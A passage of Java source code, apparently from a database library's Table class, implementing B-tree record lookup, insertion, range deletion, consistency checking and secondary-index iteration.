(maxKey == null || maxKey.compareTo(rec.getKeyField()) > 0)) {
maxKey = (LongField) keyField;
}
insertedRecord(rec);
}
}
finally {
nodeMgr.releaseNodes();
}
if (maxKey != null && maxKey.getLongValue() > tableRecord.getMaxKey()) {
tableRecord.setMaxKey(maxKey.getLongValue());
}
tableRecord.setRecordCount(actualCount);
if (!isConsistent(monitor)) {
throw new IOException(
"Consistency check failed after rebuilding table " + getName());
}
}
}
/**
* Check the consistency of this table and its associated index tables.
* @param monitor task monitor
* @return true if consistency check passed, else false
* @throws IOException thrown if IO error occurs
* @throws CancelledException is task was cancelled
*/
public boolean isConsistent(TaskMonitor monitor) throws IOException, CancelledException {
return isConsistent(null, monitor);
}
boolean isConsistent(String indexName, TaskMonitor monitor)
throws IOException, CancelledException {
synchronized (db) {
if (rootBufferId < 0) {
return true;
}
monitor.setMessage("Check Table " + getName());
boolean consistent;
try {
BTreeNode rootNode = getBTreeNode(rootBufferId);
consistent = rootNode.isConsistent(getName(), monitor);
}
catch (IOException t) {
Msg.debug(this, "Consistency Error (" + getName() +
"): failed to fetch root buffer: " + t.getMessage());
return false;
}
finally {
nodeMgr.releaseNodes();
}
// Check consistency of index tables
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
monitor.setMessage("Check Table " + getName() + "." +
schema.getFieldNames()[indexTable.getColumnIndex()]);
consistent &= indexTable.isConsistent(monitor);
}
HashMap<Integer, Integer> missingIndexRecMap = new HashMap<>();
int actualCount = 0;
RecordIterator recIter = iterator();
while (recIter.hasNext()) {
DBRecord rec = recIter.next();
++actualCount;
// Check for bad index tables (missing or invalid entries)
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
Field f = rec.getField(indexedColumn);
if (indexTable.isSparseIndex && f.isNull()) {
continue; // skip unindexed field
}
boolean found = false;
Field[] keys = indexTable.findPrimaryKeys(f);
for (Field key : keys) {
if (key.equals(rec.getKeyField())) {
found = true;
break;
}
}
if (!found) {
consistent = false;
Integer missing = missingIndexRecMap.get(indexTable.getColumnIndex());
if (missing == null) {
missingIndexRecMap.put(indexTable.getColumnIndex(), 1);
}
else {
missingIndexRecMap.put(indexTable.getColumnIndex(), missing + 1);
}
logIndexConsistencyError(
schema.getFieldNames()[indexTable.getColumnIndex()],
"Index table does not reference record key: " +
rec.getKeyField().getValueAsString());
}
}
}
if (actualCount != getRecordCount()) {
consistent = false;
logIndexConsistencyError(indexName,
"Table record count inconsistent: iterator-count=" + actualCount +
" stored-count=" + getRecordCount());
}
for (int indexCol : missingIndexRecMap.keySet()) {
int missing = missingIndexRecMap.get(indexCol);
logIndexConsistencyError(schema.getFieldNames()[indexCol],
"Index is missing " + missing + " record references");
}
// Check for bad index tables (missing or invalid entries)
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
monitor.setMessage("Check Index " + getName() + "." +
schema.getFieldNames()[indexTable.getColumnIndex()]);
HashSet<Field> keySet = new HashSet<>();
int extra = 0;
DBFieldIterator keyIterator = indexTable.keyIterator();
while (keyIterator.hasNext()) {
Field key = keyIterator.next();
if (getRecord(key) == null) {
++extra;
}
if (!keySet.add(key)) {
logIndexConsistencyError(
schema.getFieldNames()[indexTable.getColumnIndex()],
"Index table references duplicate key: " + key.getValueAsString());
}
}
if (extra != 0) {
consistent = false;
logIndexConsistencyError(schema.getFieldNames()[indexTable.getColumnIndex()],
"Index table references " + extra + " nonexistent record keys");
}
}
return consistent;
}
}
void logIndexConsistencyError(String indexName, String msg) {
Msg.debug(this, "Index Consistency Error (" + getName() +
(indexName != null ? ("." + indexName) : "") + "): " + msg);
}
/**
* Delete all records within this table.
* @throws IOException if IO error occurs
*/
public void deleteAll() throws IOException {
synchronized (db) {
db.checkTransaction();
if (rootBufferId < 0) {
return;
}
try {
BTreeNode rootNode = getBTreeNode(rootBufferId);
try {
// Delete all records
rootNode.delete();
// Delete all index entries
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
indexTable.deleteAll();
}
}
finally {
tableRecord.setRootBufferId(rootBufferId = -1);
tableRecord.setRecordCount(recordCount = 0);
tableRecord.setMaxKey(maximumKey = Long.MIN_VALUE);
}
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the list of columns which are indexed
* @return list of indexed columns
*/
public int[] getIndexedColumns() {
return indexedColumns;
}
/**
* Remove the index associated with the specified column.
* @param columnIndex column corresponding to the column index which
* should be deleted.
* @throws IOException thrown if IO error occurs
*/
void removeIndex(int columnIndex) throws IOException {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable != null) {
indexTable.deleteAll();
db.getMasterTable().deleteTableRecord(indexTable.getTableNum());
secondaryIndexes.remove(columnIndex);
indexedColumns = secondaryIndexes.getKeys();
}
}
/**
* Get this tables schema.
* @return table schema
*/
public Schema getSchema() {
return schema;
}
/**
* Get table name
* @return table name
*/
public String getName() {
return tableRecord.getName();
}
/**
* Change the name of this table
* @param name new table name
* @return true if rename successful
* @throws DuplicateNameException if new table name already exists
*/
public boolean setName(String name) throws DuplicateNameException {
return db.setTableName(getName(), name);
}
/**
* Get record count
* @return record count
*/
public int getRecordCount() {
return (tableRecord == null ? 0 : tableRecord.getRecordCount());
}
/**
* Get the maximum record key which has ever been assigned within this table.
* This method is only valid for those tables which employ a long key and may
* not reflect records which have been removed (i.e., returned key may not
* correspond to an existing record).
* @return maximum record key.
*/
public long getMaxKey() {
return tableRecord.getMaxKey();
}
/**
* Get the next available key.
* This method is only valid for those tables which employ a long key.
* @return next available key.
*/
public long getKey() {
long key = getMaxKey();
if (key == Long.MIN_VALUE) {
return 0;
}
return key + 1;
}
// /**
// * Sets the current root node for this table.
// * If the root changes the master table must be updated.
// * @param rootNode
// */
// private void setRootNode(LongKeyNode rootNode) {
// int id = rootNode.getBufferId();
// if (rootBufferId != id) {
// tableRecord.setRootBufferId(id);
// rootBufferId = id;
// }
// }
//
// /**
// * Sets the current root node for this table.
// * If the root changes the master table must be updated.
// * @param rootNode
// */
// private void setRootNode(VarKeyNode rootNode) {
// int id = rootNode.getBufferId();
// if (rootBufferId != id) {
// tableRecord.setRootBufferId(id);
// rootBufferId = id;
// }
// }
/**
* Determine if this table contains a record with the specified key.
* @param key record key.
* @return true if record exists with key, else false.
* @throws IOException thrown if IO error occurs
*/
public boolean hasRecord(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return false;
}
boolean result = false;
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
result = leaf.getKeyIndex(key) >= 0;
}
finally {
nodeMgr.releaseNodes();
}
return result;
}
}
/**
* Determine if this table contains a record with the specified key.
* @param key record key.
* @return true if record exists with key, else false.
* @throws IOException throw if an IO Error occurs
*/
public boolean hasRecord(Field key) throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
return hasRecord(key.getLongValue());
}
if (rootBufferId < 0) {
return false;
}
boolean result = false;
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
result = leaf.getKeyIndex(key) >= 0;
}
finally {
nodeMgr.releaseNodes();
}
return result;
}
}
/**
* Get the record identified by the specified key value.
* @param key unique record key.
* @return Record the record identified by key, or null if record was not
* found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecord(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecord(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record identified by the specified key value.
* @param key unique record key.
* @return Record the record identified by key, or null if record was not
* found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecord(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecord(key.getLongValue());
}
FieldKeyRecordNode leaf;
try {
if (key instanceof FixedField) {
leaf = nodeMgr.getFixedKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecord(key, schema);
}
leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecord(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the maximum key value which is less than
* the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value less than the
* specified key, or null if no record was found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecordBefore(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordBefore(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the maximum key value which is less than
* the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value less than the
* specified key, or null if no record was found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecordBefore(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecordBefore(key.getLongValue());
}
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordBefore(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the minimum key value which is greater than
* the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value greater than the
* specified key, or null if no record was found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecordAfter(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAfter(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the minimum key value which is greater than
* the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value greater than the
* specified key, or null if no record was found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecordAfter(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecordAfter(key.getLongValue());
}
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAfter(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the maximum key value which is less than or equal
* to the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value less than or equal to the
* specified key, or null if no record was found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecordAtOrBefore(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAtOrBefore(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the maximum key value which is less than or equal
* to the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value less than or equal to the
* specified key, or null if no record was found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecordAtOrBefore(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecordAtOrBefore(key.getLongValue());
}
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAtOrBefore(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the minimum key value which is greater than or equal
* to the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value greater than or equal to the
* specified key, or null if no record was found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecordAtOrAfter(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAtOrAfter(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the minimum key value which is greater than or equal
* to the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value greater than or equal to the
* specified key, or null if no record was found.
* @throws IOException throw if an IO Error occurs
*/
public DBRecord getRecordAtOrAfter(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecordAtOrAfter(key.getLongValue());
}
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAtOrAfter(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Put the specified record into the stored BTree.
* @param record the record to be stored.
* @throws IOException throw if an IO Error occurs
*/
public void putRecord(DBRecord record) throws IOException {
synchronized (db) {
db.checkTransaction();
if (schema.useLongKeyNodes()) {
putLongKeyRecord(record);
}
else {
putFieldKeyRecord(record);
}
}
}
/**
* Store a record which uses a long key (requires DBHandle lock)
* @param record recore to be inserted or updated
* @throws IOException throw if an IO Error occurs
*/
private void putLongKeyRecord(DBRecord record) throws IOException {
// boolean inserted = false;
try {
// ?? Do we need to validate record against schema
// Establish root node
++modCount;
LongKeyNode rootNode = null;
if (rootBufferId < 0) {
rootNode = LongKeyRecordNode.createRecordNode(nodeMgr, schema);
}
else {
rootNode = nodeMgr.getLongKeyNode(rootBufferId);
}
// Put record and update root buffer ID
long recKey = record.getKey();
LongKeyRecordNode leaf = rootNode.getLeafNode(recKey);
rootNode = leaf.putRecord(record, isIndexed ? this : null);
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
// Update maximum key
if (maximumKey < recKey) {
maximumKey = recKey;
tableRecord.setMaxKey(maximumKey);
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
// inserted = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
}
/**
* Store a record which uses a Field key (requires DBHandle lock)
* @param record record to be inserted or updated
* @throws IOException throw if an IO Error occurs
*/
private void putFieldKeyRecord(DBRecord record) throws IOException {
// boolean inserted = false;
try {
// ?? Do we need to validate record against schema
// Establish root node
++modCount;
FieldKeyNode rootNode = null;
if (rootBufferId < 0) {
rootNode = schema.useFixedKeyNodes() ? FixedKeyRecordNode.createRecordNode(nodeMgr)
: new VarKeyRecordNode(nodeMgr, schema.getKeyFieldType());
}
else {
rootNode = getFieldKeyNode(rootBufferId);
}
// Put record and update root buffer ID
Field recKey = record.getKeyField();
FieldKeyRecordNode leaf = rootNode.getLeafNode(recKey);
rootNode = leaf.putRecord(record, isIndexed ? this : null);
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
// NOTE: Maximum key is not tracked
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
// inserted = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
}
/**
* Delete a record identified by the specified key value.
* @param key unique record key.
* @return true if record was deleted successfully.
* @throws IOException throw if an IO Error occurs
*/
public boolean deleteRecord(long key) throws IOException {
synchronized (db) {
db.checkTransaction();
boolean result = false;
if (rootBufferId < 0) {
return false;
}
if (!schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Field key required");
}
try {
++modCount;
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
LongKeyRecordNode leaf = rootNode.getLeafNode(key);
rootNode = leaf.deleteRecord(key, isIndexed ? this : null);
if (rootNode != null) {
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
}
else {
rootBufferId = -1;
tableRecord.setRootBufferId(rootBufferId);
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
result = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
return result;
}
}
/**
* Delete a record identified by the specified key value.
* @param key unique record key.
* @return true if record was deleted successfully.
* @throws IOException throw if an IO Error occurs
*/
public boolean deleteRecord(Field key) throws IOException {
synchronized (db) {
db.checkTransaction();
boolean result = false;
if (rootBufferId < 0) {
return false;
}
if (key instanceof LongField) {
return deleteRecord(key.getLongValue());
}
try {
++modCount;
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
FieldKeyRecordNode leaf = rootNode.getLeafNode(key);
rootNode = leaf.deleteRecord(key, isIndexed ? this : null);
if (rootNode != null) {
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
}
else {
rootBufferId = -1;
tableRecord.setRootBufferId(rootBufferId);
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
result = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
return result;
}
}
/**
* Delete all records whose keys fall within the specified range, inclusive.
* @param startKey minimum key value
* @param endKey maximum key value
* @return true if one or more records were deleted.
* @throws IOException thrown if an IO error occurs
*/
public boolean deleteRecords(long startKey, long endKey) throws IOException {
synchronized (db) {
db.checkTransaction();
if (startKey > endKey) {
throw new IllegalArgumentException();
}
if (!schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Long key required");
}
boolean result = false;
if (rootBufferId < 0) {
return result;
}
try {
++modCount;
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
LongKeyRecordNode leaf = rootNode.getLeafNode(startKey);
try {
// Handle partial first leaf where leftmost key is not deleted
int index = leaf.getKeyIndex(startKey);
long lastKey = 0;
if (index < 0) {
index = -index - 1;
}
if (index > 0) {
int lastIndex = leaf.getKeyIndex(endKey);
if (lastIndex < 0) {
lastIndex = -lastIndex - 2;
}
// delete individual records within first leaf
while (index <= lastIndex--) {
if (isIndexed) {
deletedRecord(leaf.getRecord(schema, index));
}
leaf.remove(index);
}
result = true;
if (index < leaf.keyCount) {
return result;
}
LongKeyRecordNode nextLeaf = leaf.getNextLeaf();
if (nextLeaf == null) {
return result;
}
lastKey = nextLeaf.getKey(nextLeaf.keyCount - 1);
leaf = rootNode.getLeafNode(lastKey);
index = 0;
}
else {
lastKey = leaf.getKey(leaf.keyCount - 1);
}
// Handle additional whole leaves
while (lastKey <= endKey) {
if (isIndexed) {
for (int n = 0; n < leaf.keyCount; n++) {
deletedRecord(leaf.getRecord(schema, n));
}
}
LongKeyRecordNode nextLeaf = leaf.getNextLeaf();
rootNode = leaf.removeLeaf();
result = true;
if (nextLeaf == null) {
return result;
}
lastKey = nextLeaf.getKey(nextLeaf.keyCount - 1);
leaf = rootNode.getLeafNode(lastKey);
}
// Handle final leaf
// delete individual records within first leaf
int lastIndex = leaf.getKeyIndex(endKey);
if (lastIndex < 0) {
lastIndex = -lastIndex - 2;
}
long key = leaf.getKey(0);
while (index <= lastIndex--) {
if (isIndexed) {
deletedRecord(leaf.getRecord(schema, index));
}
leaf.remove(index);
result = true;
}
if (index == 0 && leaf.parent != null) {
leaf.parent.keyChanged(key, leaf.getKey(0));
}
}
finally {
// Update root node
if (rootNode != null) {
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
}
else {
rootBufferId = -1;
tableRecord.setRootBufferId(rootBufferId);
}
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
result = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
return result;
}
}
/**
* Delete all records whose keys fall within the specified range, inclusive.
* @param startKey minimum key value
* @param endKey maximum key value
* @return true if one or more records were deleted.
* @throws IOException thrown if an IO error occurs
*/
public boolean deleteRecords(Field startKey, Field endKey) throws IOException {
synchronized (db) {
db.checkTransaction();
if (startKey.compareTo(endKey) > 0) {
throw new IllegalArgumentException();
}
if (schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Field key required");
}
boolean result = false;
if (rootBufferId < 0) {
return result;
}
try {
++modCount;
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
FieldKeyRecordNode leaf = rootNode.getLeafNode(startKey);
try {
// Handle partial first leaf where leftmost key is not deleted
int index = leaf.getKeyIndex(startKey);
Field lastKey = null;
if (index < 0) {
index = -index - 1;
}
if (index > 0) {
int lastIndex = leaf.getKeyIndex(endKey);
if (lastIndex < 0) {
lastIndex = -lastIndex - 2;
}
// delete individual records within first leaf
while (index <= lastIndex--) {
if (isIndexed) {
deletedRecord(leaf.getRecord(schema, index));
}
leaf.remove(index);
}
result = true;
if (index < leaf.getKeyCount()) {
return result;
}
RecordNode nextLeaf = leaf.getNextLeaf();
if (nextLeaf == null) {
return result;
}
lastKey = nextLeaf.getKeyField(nextLeaf.getKeyCount() - 1);
leaf = rootNode.getLeafNode(lastKey);
index = 0;
}
else {
lastKey = leaf.getKeyField(leaf.getKeyCount() - 1);
}
// Handle additional whole leaves
while (lastKey.compareTo(endKey) <= 0) {
if (isIndexed) {
int count = leaf.getKeyCount();
for (int n = 0; n < count; n++) {
deletedRecord(leaf.getRecord(schema, n));
}
}
RecordNode nextLeaf = leaf.getNextLeaf();
rootNode = leaf.removeLeaf();
result = true;
if (nextLeaf == null) {
return result;
}
lastKey = nextLeaf.getKeyField(nextLeaf.getKeyCount() - 1);
leaf = rootNode.getLeafNode(lastKey);
}
// Handle final leaf
// delete individual records within first leaf
int lastIndex = leaf.getKeyIndex(endKey);
if (lastIndex < 0) {
lastIndex = -lastIndex - 2;
}
Field key = leaf.getKeyField(0);
while (index <= lastIndex--) {
if (isIndexed) {
deletedRecord(leaf.getRecord(schema, index));
}
leaf.remove(index);
result = true;
}
if (index == 0 && leaf.getParent() != null) {
leaf.getParent().keyChanged(key, leaf.getKeyField(0), leaf);
}
}
finally {
// Update root node
if (rootNode != null) {
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
}
else {
rootBufferId = -1;
tableRecord.setRootBufferId(rootBufferId);
}
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
result = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
return result;
}
}
/**
* Find the primary keys corresponding to those records which contain the
* specified field value in the specified record column. The table must
* have been created with long keys and a secondary index on the specified
* column index.
* @param field the field value
* @param columnIndex the record schema column which should be searched.
* @return list of primary keys
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public Field[] findRecords(Field field, int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.findPrimaryKeys(field);
}
}
/**
* Get the number of records which contain the
* specified field value in the specified record column. The table must
* have been created with a secondary index on the specified column index.
* @param field the field value
* @param columnIndex the record schema column which should be searched.
* @return number of records which match the specified field value.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public int getMatchingRecordCount(Field field, int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.getKeyCount(field);
}
}
/**
* Determine if a record exists with the specified value within the specified
* column. The table must have been created with a secondary index on the
* specified column index.
* @param field the field value
* @param columnIndex the record schema column which should be searched.
* @return true if one or more records exis with the specified value.
* @throws IOException thrown if IO error occurs
*/
public boolean hasRecord(Field field, int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.hasRecord(field);
}
}
/**
* Iterate over all the unique index field values. Index values are
* returned in an ascending sorted order with the initial iterator position
* set to the minimum index value.
* @param columnIndex identifies an indexed column.
* @return index field iterator.
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexFieldIterator(int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.indexIterator();
}
}
/**
* Iterate over all the unique index field values within the specified range identified
* by minField and maxField. Index values are returned in an ascending sorted order.
* @param minField minimum index column value, if null absolute minimum is used
* @param maxField maximum index column value, if null absolute maximum is used
* @param before if true initial position is before minField, else position
* is after maxField
* @param columnIndex identifies an indexed column.
* @return index field iterator.
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexFieldIterator(Field minField, Field maxField, boolean before,
int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.indexIterator(minField, maxField, before);
}
}
/**
* Iterate over all the unique index field values within the specified range identified
* by minField and maxField. Index values are returned in an ascending sorted order with the
* initial iterator position corresponding to the startField.
* @param minField minimum index column value, if null absolute minimum is used
* @param maxField maximum index column value, if null absolute maximum is used
* @param startField index column value corresponding to initial position of iterator
* @param before if true initial position is before startField value, else position
* is after startField value
* @param columnIndex identifies an indexed column.
* @return index field iterator.
* @throws IOException if a secondary index does not exist for the specified
* column or an I/O error occurs.
*/
public DBFieldIterator indexFieldIterator(Field minField, Field maxField, Field startField,
boolean before, int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.indexIterator(minField, maxField, startField, before);
}
}
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. This table must have been constructed with a secondary
* index on the specified column.
* @param columnIndex schema column to sort on.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column or an I/O error occurs.
*/
public RecordIterator indexIterator(int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this, indexTable.keyIterator());
}
}
/**
* Iterate over a range of records using a secondary index. Sorting occurs on the
* specified schema column. The iterator is initially positioned before the startValue.
* This table must have been constructed with a secondary index on the specified column.
* @param columnIndex schema column to sort on.
* @param startValue the starting and minimum value of the secondary index field.
* @param endValue the ending and maximum value of the secondary index field.
* @param atStart if true, position the iterator before the start value.
* Otherwise, position the iterator after the end value.
*
* @return record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public RecordIterator indexIterator(int columnIndex, Field startValue, Field endValue,
boolean atStart) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this,
indexTable.keyIterator(startValue, endValue, atStart));
}
}
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. The iterator's initial position immediately follows
* the specified startValue. If this value does not exist, the initial position corresponds
* to where it would exist.
* This table must have been constructed with a secondary index on the specified column.
* @param columnIndex schema column to sort on.
* @param startValue the starting value of the secondary index field.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public RecordIterator indexIteratorAfter(int columnIndex, Field startValue) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this, indexTable.keyIteratorAfter(startValue));
}
}
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. The iterator's initial position immediately precedes
* the specified startValue. If this value does not exist, the initial position corresponds
* to where it would exist.
* This table must have been constructed with a secondary index on the specified column.
* @param columnIndex schema column to sort on.
* @param startValue the starting value of the secondary index field.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public RecordIterator indexIteratorBefore(int columnIndex, Field startValue)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this, indexTable.keyIteratorBefore(startValue));
}
}
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. The iterator's initial position immediately follows
* the specified startValue and primaryKey. If no such entry exists, the initial position
* corresponds to where it would exist.
* <p>
* This table must have been constructed with a secondary index on the specified column.
*
* @param columnIndex schema column to sort on.
* @param startValue the starting value of the secondary index field.
* @param primaryKey the primary key associated with the startField.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public RecordIterator indexIteratorAfter(int columnIndex, Field startValue, Field primaryKey)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this,
indexTable.keyIteratorAfter(startValue, primaryKey));
}
}
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. The iterator's initial position immediately precedes
* the specified startValue and primaryKey. If no such entry exists, the initial position
* corresponds to where it would exist.
* <p>
* This table must have been constructed with a secondary index on the specified column.
*
* @param columnIndex schema column to sort on.
* @param startValue the starting value of the secondary index field.
* @param primaryKey the primary key associated with the startField.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
